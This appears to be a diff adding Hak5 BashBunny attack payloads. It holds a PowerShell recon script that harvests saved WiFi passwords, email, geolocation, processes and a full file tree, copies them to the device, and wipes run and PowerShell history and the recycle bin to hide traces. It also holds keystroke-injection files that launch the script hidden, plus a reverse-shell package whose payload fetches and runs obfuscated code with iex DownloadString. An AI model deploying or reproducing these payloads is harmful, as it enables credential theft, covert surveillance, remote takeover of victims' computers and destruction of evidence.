# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This is an advanced recon of a target PC and exfiltration of that data
.DESCRIPTION
This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running
All of the gather information is formatted neatly and output to a file
That file is then exfiltrated to the BashBunny
#>
############################################################################################################################################################
# Creating loot folder
# Get Drive Letter
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
# Test if directory exists if not create directory in loot folder to store file
$TARGETDIR = "$bb\loot\ADV-Recon\$env:computername"
if(!(Test-Path -Path $TARGETDIR )){
mkdir $TARGETDIR
}
############################################################################################################################################################
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$FN = Get-fullName
#------------------------------------------------------------------------------------------------------------------------------------
function Get-email {
try {
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
return $email
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "No Email Detected"
-ErrorAction SilentlyContinue
}
}
$EM = Get-email
#------------------------------------------------------------------------------------------------------------------------------------
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GL = Get-GeoLocation
############################################################################################################################################################
# Get nearby wifi networks
try
{
$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim()
}
catch
{
$NearbyWifi="No nearby wifi networks detected"
}
############################################################################################################################################################
# Get info about pc
# Get IP / Network Info
try
{
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
}
catch
{
$computerPubIP="Error getting Public IP"
}
$computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}
############################################################################################################################################################
$IsDHCPEnabled = $false
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}
foreach ($Network in $Networks) {
If($network.DHCPEnabled) {
$IsDHCPEnabled = $true
}
$MAC = ipconfig /all | Select-String -Pattern "physical" | select-object -First 1; $MAC = [string]$MAC; $MAC = $MAC.Substring($MAC.Length - 17)
}
############################################################################################################################################################
#Get System Info
$computerSystem = Get-CimInstance CIM_ComputerSystem
$computerBIOS = Get-CimInstance CIM_BIOSElement
$computerOs=Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List
$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List
$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List
$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)}
$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table
############################################################################################################################################################
# Get HDDs
$driveType = @{
2="Removable disk "
3="Fixed local disk "
4="Network disk "
5="Compact disk "}
$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; }
#Get - Com & Serial Devices
$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table
# Check RDP
$RDP
if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) {
$RDP = "RDP is Enabled"
} else {
$RDP = "RDP is NOT enabled"
}
############################################################################################################################################################
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get wifi SSIDs and Passwords
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
$WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects =@()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
#get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
try{
$WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
}Catch{
$WLANProfilePassword = "The password is not stored in this profile"
}
#Build the object and add this to an array
$WLANProfileObject = New-Object PSCustomobject
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
$WLANProfileObjects += $WLANProfileObject
Remove-Variable WLANProfileObject
}
############################################################################################################################################################
# local-user
$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID
# process first
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
# Get Listeners / ActiveTcpConnections
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
$listenerItem = $_
$processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
new-object PSObject -property @{
"LocalAddress" = $listenerItem.LocalAddress
"RemoteAddress" = $listenerItem.RemoteAddress
"State" = $listenerItem.State
"AppliedSetting" = $listenerItem.AppliedSetting
"OwningProcess" = $listenerItem.OwningProcess
"ProcessName" = $processItem.ProcessName
}
} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table
# process last
$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine
# service
$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName
# installed software (get uninstaller)
$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize
# drivers
$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion
# videocard
$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution
############################################################################################################################################################
# MAKE LOOT FOLDER
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_computer_recon.txt"
############################################################################################################################################################
# OUTPUTS RESULTS TO LOOT FILE
Clear-Host
Write-Host
echo "Name:" >> $env:TMP\$FileName
echo "==================================================================" >> $env:TMP\$FileName
echo $FN >> $env:TMP\$FileName
echo "" >> $env:TMP\$FileName
echo "Email:" >> $env:TMP\$FileName
echo "==================================================================" >> $env:TMP\$FileName
echo $EM >> $env:TMP\$FileName
echo "" >> $env:TMP\$FileName
echo "GeoLocation:" >> $env:TMP\$FileName
echo "==================================================================" >> $env:TMP\$FileName
echo $GL >> $env:TMP\$FileName
echo "" >> $env:TMP\$FileName
echo "Nearby Wifi:" >> $env:TMP\$FileName
echo "==================================================================" >> $env:TMP\$FileName
echo $NearbyWifi >> $env:TMP\$FileName
echo "" >> $env:TMP\$FileName
$computerSystem.Name >> $env:TMP\$FileName
"==================================================================
Manufacturer: " + $computerSystem.Manufacturer >> $env:TMP\$FileName
"Model: " + $computerSystem.Model >> $env:TMP\$FileName
"Serial Number: " + $computerBIOS.SerialNumber >> $env:TMP\$FileName
"" >> $env:TMP\$FileName
"" >> $env:TMP\$FileName
"" >> $env:TMP\$FileName
"OS:
=================================================================="+ ($computerOs |out-string) >> $env:TMP\$FileName
"CPU:
=================================================================="+ ($computerCpu| out-string) >> $env:TMP\$FileName
"RAM:
==================================================================
Capacity: " + $computerRamCapacity+ ($computerRam| out-string) >> $env:TMP\$FileName
"Mainboard:
=================================================================="+ ($computerMainboard| out-string) >> $env:TMP\$FileName
"Bios:
=================================================================="+ (Get-WmiObject win32_bios| out-string) >> $env:TMP\$FileName
"Local-user:
=================================================================="+ ($luser| out-string) >> $env:TMP\$FileName
"HDDs:
=================================================================="+ ($Hdds| out-string) >> $env:TMP\$FileName
"COM & SERIAL DEVICES:
==================================================================" + ($COMDevices | Out-String) >> $env:TMP\$FileName
"Network:
==================================================================
Computers MAC address: " + $MAC >> $env:TMP\$FileName
"Computers IP address: " + $computerIP.ipaddress[0] >> $env:TMP\$FileName
"Public IP address: " + $computerPubIP >> $env:TMP\$FileName
"RDP: " + $RDP >> $env:TMP\$FileName
"" >> $env:TMP\$FileName
($Network| out-string) >> $env:TMP\$FileName
"W-Lan profiles:
=================================================================="+ ($WLANProfileObjects| Out-String) >> $env:TMP\$FileName
"listeners / ActiveTcpConnections
=================================================================="+ ($listener| Out-String) >> $env:TMP\$FileName
"Current running process:
=================================================================="+ ($process| Out-String) >> $env:TMP\$FileName
"Services:
=================================================================="+ ($service| Out-String) >> $env:TMP\$FileName
"Installed software:
=================================================================="+ ($software| Out-String) >> $env:TMP\$FileName
"Installed drivers:
=================================================================="+ ($drivers| Out-String) >> $env:TMP\$FileName
"Installed videocards:
==================================================================" + ($videocard| Out-String) >> $env:TMP\$FileName
############################################################################################################################################################
# Recon all User Directories
tree $Env:userprofile /a /f >> $env:TMP\$FileName
############################################################################################################################################################
# Remove Variables
Remove-Variable -Name computerPubIP,
computerIP,IsDHCPEnabled,Network,Networks,
computerMAC,computerSystem,computerBIOS,computerOs,
computerCpu, computerMainboard,computerRamCapacity,
computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName,
Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser,
process,listener,listenerItem,process,service,software,drivers,videocard,
vault -ErrorAction SilentlyContinue -Force
############################################################################################################################################################
# Exfiltrate Loot
Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
############################################################################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
############################################################################################################################################################
# Popup message to signal the payload is done
$done = New-Object -ComObject Wscript.Shell;$done.Popup("script is done",1)

96
payloads/library/recon/-BB-ADV-Recon/README.md Normal file
View File

@ -0,0 +1,96 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# ADV-Recon
A script used to do an advanced level of Recon on the targets computer
## Description
This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The GeoLocation (latitude and longitude) of where the script was ran.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Intel on the system Info, HDDs, network interfaces, TCP connections, Processes, Services, Installed software, drivers, and video card
Along with TREE list of all files in the target computer is gathered and uploaded to your BashBunny
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Command will be entered in the RunBox to start the ADV-Recon script
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-ADV-Recon)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

22
payloads/library/recon/-BB-ADV-Recon/payload.txt Normal file
View File

@ -0,0 +1,22 @@
# Title: ADV-Recon
# Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details.
# Author: I am Jakoby
# Version: 1.0
# Category: Recon
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ADV-Recon.ps1')"
QUACK ENTER

1
payloads/library/remote_access/ReverseBunnySSL/RBSSL.ps1 Normal file
View File

File diff suppressed because one or more lines are too long

30
payloads/library/remote_access/ReverseBunnySSL/README.md Normal file
View File

@ -0,0 +1,30 @@
**Title: ReverseBunnySSL**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.2<br>
For input and inspiration - Thanks to: Cribbit, sebkinne</p>
**What is ReverseBunnySSL?**
#
<p>ReverseBunnySSL gets you remote access to your target in seconds.<br>
Unlike ReverseBunny, ReverseBunnySSL offers encrypted traffic via OpenSSL.</p>
**Instruction:**
<p>!Insert the IP of your attacking machine & PORT into the payload.txt!<br>
1. Create key.pem & cert.pem like so: <br>
> openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes<br>
It will ask for information about the certificate - Insert whatever you want.<br>
2. For catching the shell you need to start a listener, which supports encrypted traffic.<br>
I recommend openssl itself or ncat - Example syntax for both:<br>
> `openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]` <br>
> `ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem`</p>
3. Plug in Bunny, it will create a web server, and uses Invoke-Expression to execute the shell.
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)

BIN
payloads/library/remote_access/ReverseBunnySSL/Startscreen.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 32 KiB

44
payloads/library/remote_access/ReverseBunnySSL/payload.txt Normal file
View File

@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: ReverseBunnySSL
# Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0iphor13
# Version: 1.2
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#Opens hidden powershell instance
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell -NoP -NonI -w hidden"
Q DELAY 500
Q ENTER
Q DELAY 500
#Insert attacking IP & port below
Q STRING "\$I='0.0.0.0';\$P=4444;"
Q DELAY 250
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RBSSL.ps1\")"
Q DELAY 200
Q ENTER
LED FINISH